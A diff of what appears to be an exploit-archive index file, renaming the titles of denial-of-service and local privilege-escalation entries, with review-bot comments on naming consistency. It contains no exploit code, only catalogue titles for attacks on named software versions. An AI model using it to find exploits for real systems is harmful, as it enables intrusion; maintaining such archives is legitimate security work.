27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0
27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0
27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",windows,dos,0
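Review bot: the new 27778 description adds the affected versions but leaves the component name unquoted (`nttrans Reply Integer Overflow`), whereas the other rewrites in this commit wrap the component in single quotes (`'SIZE'`, `'xslt'`, `'receive_smb_raw()'`, `'results.stm'`); consider `"Samba 3.5.22/3.6.17/4.0.8 - 'nttrans' Reply Integer Overflow"` for consistency with those rows.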
@ -4432,8 +4432,8 @@ id,file,description,date,author,platform,type,port
35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0
@ -4532,7 +4532,7 @@ id,file,description,date,author,platform,type,port
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - (SEH) Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0
36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0
@ -4791,7 +4791,7 @@ id,file,description,date,author,platform,type,port
38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0
38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0
38558,platforms/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos,0
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
@ -4816,7 +4816,7 @@ id,file,description,date,author,platform,type,port
38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,dos,0
38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0
@ -5001,7 +5001,7 @@ id,file,description,date,author,platform,type,port
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - (SEH)Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service",2016-03-14,INSECT.B,windows,dos,0
39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,windows,dos,0
39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
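Review bot: the new title for 39557 wraps "Denial of Service" in parentheses, which no other dos entry in this file does (compare 38589 "'test_root()' Local Denial of Service" in an earlier hunk, where the phrase stays bare); suggest either keeping the original "Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service" or reordering to "... Denial of Service (SEH)" so that only the SEH qualifier is parenthesised.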
@ -5183,7 +5183,7 @@ id,file,description,date,author,platform,type,port
39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0
40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0
40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0
40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
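Review bot: the "Remote Stack Buffer Overflow in dec2lha Library" to "'dec2lha Library' Remote Stack Buffer Overflow" rewrite is applied only to 40032, while the adjacent 40034, 40035 and 40036 entries in the same hunk keep the "X in Y" form ("Heap Overflow Modifying MIME Messages", "Integer Overflow in TNEF Decoder", "Missing Bounds Checks in dec2zip ..."); either normalise the whole Symantec group here or leave 40032 alone so the family reads consistently.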
@ -5550,7 +5550,7 @@ id,file,description,date,author,platform,type,port
42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0
42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
42191,platforms/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",multiple,dos,0
42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
@ -5672,7 +5672,7 @@ id,file,description,date,author,platform,type,port
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
@ -6585,7 +6585,7 @@ id,file,description,date,author,platform,type,port
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)",2014-05-19,"Mike Czumak",windows,local,0
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",windows,local,0
10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0
10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0
10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
@ -6655,12 +6655,12 @@ id,file,description,date,author,platform,type,port
10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0
10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow",2009-12-30,mr_me,windows,local,0
10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit",2009-12-30,"Sébastien Duquette",windows,local,0
10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0
10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0
10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0
11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0
11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0
11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0
11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,windows,local,0
11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
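Review bot: replacing "(Bindshell)" with "(2)" on 11046 drops the only information that distinguishes the two Quick Player 1.2 entries by payload type; the numeric suffix is fine for disambiguation, but consider keeping the descriptor, e.g. "Quick Player 1.2 - Unicode Buffer Overflow (Bindshell) (2)". The same applies to the "(calc)" qualifier removed from 13942 later in this patch.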
@ -6683,7 +6683,7 @@ id,file,description,date,author,platform,type,port
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - (SEH) Exploit",2010-01-26,TecR0c,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0
11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0
11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0
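Review bot: 11314 in the context lines ("CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow") keeps the parenthesised-field form that the rest of this patch writes with single quotes (e.g. "'test_root()'", "'.gfb'" in earlier hunks); since the Winamp rename already touches this block, "CoreFTP 2.1 b1637 - 'Password field' Universal Buffer Overflow" would match the convention.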
@ -6733,7 +6733,7 @@ id,file,description,date,author,platform,type,port
12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0
12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - (SEH) Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Exploit (SEH)",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0
12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0
12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0
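Review bot: 12053 and 12059 in the context lines ("ZipCentral - '.zip' File (SEH)", "eZip Wizard 3.0 - '.zip' File (SEH)") still use the bare "X (SEH)" form that this patch converts to "Exploit (SEH)" elsewhere (ZipScan in this hunk, Winamp 12255 "'whatsnew.txt' Exploit (SEH)" in the next); worth including them so the three '.zip' entries in one block read the same way.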
@ -6744,7 +6744,7 @@ id,file,description,date,author,platform,type,port
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@ -6767,14 +6767,14 @@ id,file,description,date,author,platform,type,port
12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow",2010-05-21,sinn3r,windows,local,0
12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0
12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow",2010-05-30,sinn3r,windows,local,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - (SEH) Exploit",2010-05-31,Stoke,windows,local,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Exploit (SEH)",2010-05-31,Stoke,windows,local,0
40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0
13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0
13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
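Review bot: 13768 in the context lines is filed as platforms/php/local/13768.py with platform "php", although its title ("Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)") describes a playlist-file stack overflow with a DEP bypass like the Windows entries around it, not a PHP issue; not part of this change, but worth checking the platform column while this block is being touched.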
@ -6783,8 +6783,8 @@ id,file,description,date,author,platform,type,port
13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0
13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0
13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0
14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
@ -6800,7 +6800,7 @@ id,file,description,date,author,platform,type,port
14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0
14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0
14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
@ -6897,20 +6897,20 @@ id,file,description,date,author,platform,type,port
14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - (SEH) Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH)",2010-09-15,"sanjeev gupta",windows,local,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0
15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0
15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0
15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
